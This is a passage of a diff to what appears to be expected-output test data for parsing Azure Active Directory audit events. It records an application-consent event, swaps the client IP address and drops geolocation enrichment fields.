\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Consent to application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -19553,25 +17861,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -19585,7 +17875,7 @@ "ObjectId": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -19724,7 +18014,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { 
@@ -19736,12 +18026,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036584200Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:45:42\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ConsentContext.IsAdminConsent\\\",\\\"ConsentContext.IsAppOnly\\\",\\\"ConsentContext.OnBehalfOfAll\\\",\\\"ConsentContext.Tags
\\\",\\\"ConsentAction.Permissions\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:42.1421458Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622848\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"24524679-8930-4afd-83b8-2dc70aa0a016\",\"ModifiedProperties\":[{\"Name\":\"ConsentContext.IsAdminConsent\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.IsAppOnly\",\"NewValue\":\"False\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.OnBehalfOfAll\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.Tags\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ConsentAction.Permissions\",\"NewValue\":\"[]
 =\\u003e [[Id: 8OmR-4WUaEqJ6aFk0groVfmOUpib6JpGsZv6jnKgD6Y, ClientId: fb91e9f0-9485-4a68-89e9-a164d20ae855, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]]; \",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Consent to application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125386800Z", + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:42\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ConsentContext.IsAdminConsent\\\",\\\"ConsentContext.IsAppOnly\\\",\\\"ConsentContext.OnBehalfOfAll\\\",\\\"ConsentContext.Tags\\\",\\\"ConsentAction.Permissions\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"M
ozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:42.1421458Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622848\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"24524679-8930-4afd-83b8-2dc70aa0a016\",\"ModifiedProperties\":[{\"Name\":\"ConsentContext.IsAdminConsent\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.IsAppOnly\",\"NewValue\":\"False\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.OnBehalfOfAll\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.Tags\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ConsentAction.Permissions\",\"NewValue\":\"[] =\\u003e [[Id: 8OmR-4WUaEqJ6aFk0groVfmOUpib6JpGsZv6jnKgD6Y, ClientId: fb91e9f0-9485-4a68-89e9-a164d20ae855, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]]; 
\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Consent to application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -19767,25 +18057,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -19799,7 +18071,7 @@ "ObjectId": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -19938,7 +18210,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { 
@@ -19950,12 +18222,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036588200Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:45:42\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ConsentContext.IsAdminConsent\\\",\\\"ConsentContext.IsAppOnly\\\",\\\"ConsentContext.OnBehalfOfAll\\\",\\\"ConsentContext.Tags
\\\",\\\"ConsentAction.Permissions\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:42.1421458Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622848\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"24524679-8930-4afd-83b8-2dc70aa0a016\",\"ModifiedProperties\":[{\"Name\":\"ConsentContext.IsAdminConsent\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.IsAppOnly\",\"NewValue\":\"False\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.OnBehalfOfAll\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.Tags\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ConsentAction.Permissions\",\"NewValue\":\"[]
 =\\u003e [[Id: 8OmR-4WUaEqJ6aFk0groVfmOUpib6JpGsZv6jnKgD6Y, ClientId: fb91e9f0-9485-4a68-89e9-a164d20ae855, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]]; \",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Consent to application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125393200Z", + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:42\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ConsentContext.IsAdminConsent\\\",\\\"ConsentContext.IsAppOnly\\\",\\\"ConsentContext.OnBehalfOfAll\\\",\\\"ConsentContext.Tags\\\",\\\"ConsentAction.Permissions\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"M
ozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:42.1421458Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622848\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"24524679-8930-4afd-83b8-2dc70aa0a016\",\"ModifiedProperties\":[{\"Name\":\"ConsentContext.IsAdminConsent\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.IsAppOnly\",\"NewValue\":\"False\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.OnBehalfOfAll\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.Tags\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ConsentAction.Permissions\",\"NewValue\":\"[] =\\u003e [[Id: 8OmR-4WUaEqJ6aFk0groVfmOUpib6JpGsZv6jnKgD6Y, ClientId: fb91e9f0-9485-4a68-89e9-a164d20ae855, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]]; 
\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Consent to application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -19981,25 +18253,7 @@ }, { "source": { - "geo": { - 